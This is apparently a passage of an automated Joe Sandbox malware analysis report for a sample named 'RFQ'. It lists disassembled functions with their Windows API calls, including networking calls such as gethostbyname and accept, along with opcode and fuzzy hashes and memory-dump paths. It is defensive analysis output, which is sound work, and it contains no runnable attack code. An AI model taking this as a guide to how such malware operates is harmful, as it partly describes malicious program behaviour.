                                                                          • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                          • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                          • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                          • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                          Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                          • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                          • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                          • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                          Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                          • GetWindowRect.USER32(?,?), ref: 00441722
                                                                          • PtInRect.USER32(?,?,?), ref: 00441734
                                                                          • MessageBeep.USER32(00000000), ref: 004417AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                          • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                          • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                          • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                          Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 3321077145-0
                                                                          • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                          • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                          • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                          • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                          Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                          • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                          • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                          • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                          • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                          Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 004503C8
                                                                          • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                          • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                          • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Proc$Parent
                                                                          • String ID:
                                                                          • API String ID: 2351499541-0
                                                                          • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                          • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                          • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                          • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                          Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                          • TranslateMessage.USER32(?), ref: 00442B01
                                                                          • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                          • String ID:
                                                                          • API String ID: 1795658109-0
                                                                          • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                          • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                          • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                          • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                          Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                          • GetCaretPos.USER32(?), ref: 004743B2
                                                                          • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                          • GetForegroundWindow.USER32 ref: 004743EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                          • String ID:
                                                                          • API String ID: 2759813231-0
                                                                          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                          Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                          • _wcslen.LIBCMT ref: 00449519
                                                                          • _wcslen.LIBCMT ref: 00449526
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend_wcslen$_wcspbrk
                                                                          • String ID:
                                                                          • API String ID: 2886238975-0
                                                                          • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                          • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                          • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                          • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                          Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __setmode$DebugOutputString_fprintf
                                                                          • String ID:
                                                                          • API String ID: 1792727568-0
                                                                          • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                          • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                          • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                          • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                          Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$AttributesLayered
                                                                          • String ID:
                                                                          • API String ID: 2169480361-0
                                                                          • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                          • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                          • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                          • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                          Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                            • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                            • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                          • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                          • String ID: cdecl
                                                                          • API String ID: 3850814276-3896280584
                                                                          • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                                          • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                          • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                                          • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                          Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                          • _memmove.LIBCMT ref: 0046D475
                                                                          • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 2502553879-0
                                                                          • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                          • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                          • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                          • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                          Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32 ref: 00448C69
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 312131281-0
                                                                          • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                          • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                          • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                          • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                          Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
